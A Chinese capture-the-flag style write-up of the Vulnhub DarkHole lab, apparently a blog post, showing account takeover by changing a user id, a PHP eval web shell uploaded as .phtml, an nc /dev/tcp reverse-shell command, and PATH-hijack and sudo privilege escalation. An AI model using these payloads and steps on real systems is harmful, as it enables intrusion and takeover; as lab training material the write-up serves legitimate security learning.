看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole_darkhole靶机

kali里使用arp-scan -l发现主机

在这里插入图片描述
在这里插入图片描述
渗透机:kali IP :172.16.5.120 靶机IP :172.16.5.156

使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.156

在这里插入图片描述
发现就开启了2280端口老样子先访问80端口,老样子扫一下端口三件套:dirb、dirsearch、gobuste扫描找到登入入口

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:逻辑漏洞:

先注册一个账号使用admin注册不行会显示下面爆红 随便注册一个666/666 使用BP抓包修改密码把id=3改为1即可。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这里现在密码已经更新 已经修改好了从新登入:admin/admin 发现登入成功!!!! 看到一个上传点 🆗又可以继续利用了

在这里插入图片描述

③:文件上传GetShell:

这里过滤了很多试了好几个都不行(连接不上)可以使用phar或者phtml进行绕过

新建一个文档输入: <?php @eval($_POST['cmd']);?> 把后缀改为png、jpg、gif 然后抓包 修改为phtml然后放包 有个蓝色的file点击即可
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

④:反弹Shell:
nc -nvlp 7777      #kaili监听端口 
bash -c 'bash -i >& /dev/tcp/172.16.5.156/7777 0>&1'  

在这里插入图片描述

⑤:sudo root提权:

cat /etc/passwd 发现了john用户 在家目录下面发现了一个toto文件执行发现和id一样的功能

然后还有userpasswd文件 发现没有权限查看 创建名为id的文件,将bash文件的位置写入id当中,然后使用export修改环境变量,优先加载tmp下的id文件,echo输出path查看是否修改成功

在这里插入图片描述
在这里插入图片描述

cd /tmp
touch id
echo "/bin/bash" > id
chmod 777 id
export PATH=/tmp:$PATH
cd /home/john
./toto

在这里插入图片描述

然后现在我们再次执行就可以查看账号和密码文件了 直接使用SSH进行连接:john/root123

在这里插入图片描述

import pty;pty.spawn("/bin/bash")  ##执行命令输入密码,回显可知,john可以以root的身份执行file.py
cat file.py
sudo python3 /home/john/file.py  ##sudo执行

在这里插入图片描述

⑥:获取FLAG:

在这里插入图片描述
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度适中

1.信息收集 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster
2.这里有个新的知识点:逻辑漏洞 通过修改密码进行改包 完成绕过
3.文件上传漏洞 phtmlphar的绕过 CTF考的比较多
4.nc反弹Shell的命令这个是固定了(背下来)
5.sudo root提权的学习

希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

…(img-SR7pwpyl-1719274259086)]
[外链图片转存中…(img-Q4dWSOQV-1719274259087)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值